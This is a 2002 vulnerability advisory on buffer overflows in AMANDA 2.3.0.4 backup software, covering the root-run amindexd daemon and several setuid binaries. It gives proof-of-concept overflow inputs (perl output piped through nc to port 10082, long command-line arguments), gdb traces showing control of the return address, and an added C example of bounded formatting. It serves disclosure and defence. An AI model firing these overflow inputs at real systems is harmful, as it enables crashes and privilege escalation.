AMANDA buffer overflow vulnerabilities

Published: 2002-05-29
Updated: 2002-05-29
Severity: High
Threat level: Remote administrator privileges
Error type: Boundary check error
Exploitation method: Server mode

Affected systems

AMANDA 2.3.0.4

Detailed description

Advanced Maryland Automatic Network Disk Archiver (AMANDA) is a backup program used on many Unix systems. Several of its binaries are installed setuid and setgid, and several of them contain buffer overflows that can lead to privilege escalation.

The local buffer overflows can only be run by members of the operator group. The more serious problem is that the amindexd daemon (10082/TCP) runs with root privileges and can be made to overflow: an overlong command sent to the server can crash the program and lead to arbitrary command execution with root privileges.

Test code

perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082
perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082

amcheck file (setuid root)
-------------------------------------------
bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'`
Segmentation fault (core dumped)
(gdb) bt
#0 0x2814c022 in ?? ()
#1 0x280f8c0a in ?? ()
#2 0x804d671 in ?? ()
#3 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)

The amgetidx file (setuid operator)
-------------------------------------------
(gdb)
bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28144022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28144022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280f0c0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804c8dd in getsockname ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The amtrmidx file (setuid operator)
-------------------------------------------
bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28141022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28141022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280edc0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804b291 in free ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-dump file (setuid operator)
-------------------------------------------
sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump
(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e 'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048874 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-gnutar file (setuid operator)
----------------------------------------------
bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar
(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e 'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048811 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

Solution

None yet.

Related information

zillion (zillion@snosoft.com)
Reference: http://archives.neohapsis.com/archives/bugtraq/2002-05/0227.html
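
The amgetidx and amtrmidx backtraces above pass through vsprintf(), which formats into its destination with no length limit. The following is an added example, not AMANDA's code or a patch from its maintainers: a bounded formatter built on vsnprintf() and a length check for an incoming command line. MSG_MAX, format_checked and read_command are hypothetical names, and the buffer size and inputs are constructed for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_MAX 256  /* assumed buffer size, not taken from AMANDA */

/* Unsafe pattern for comparison (comment only, never compiled):
 *     char buf[MSG_MAX];
 *     vsprintf(buf, fmt, ap);   // writes past buf when the result is longer
 */

/* Format into dst without ever writing more than dstlen bytes.
 * Returns 0 on success, -1 if the result did not fit or formatting failed. */
int format_checked(char *dst, size_t dstlen, const char *fmt, ...)
{
    va_list ap;
    int n;

    if (dst == NULL || dstlen == 0)
        return -1;
    va_start(ap, fmt);
    n = vsnprintf(dst, dstlen, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';           /* never hand back a truncated string */
        return -1;
    }
    return 0;
}

/* Accept one received command line only if it fits in out with its NUL.
 * Returns 0 and fills out on success, -1 if the line is too long. */
int read_command(const char *line, size_t linelen, char *out, size_t outlen)
{
    if (out == NULL || linelen >= outlen)
        return -1;
    memcpy(out, line, linelen);
    out[linelen] = '\0';
    return 0;
}

int main(void)
{
    char buf[MSG_MAX], arg[3001];
    memset(arg, 'A', 3000); arg[3000] = '\0';   /* constructed oversize input */
    printf("short: %d\n", format_checked(buf, sizeof buf, "index for %s", "host1"));
    printf("long:  %d\n", format_checked(buf, sizeof buf, "index for %s", arg));
    return 0;
}
```

Callers treat -1 as a hard error and drop the request instead of continuing with partial data.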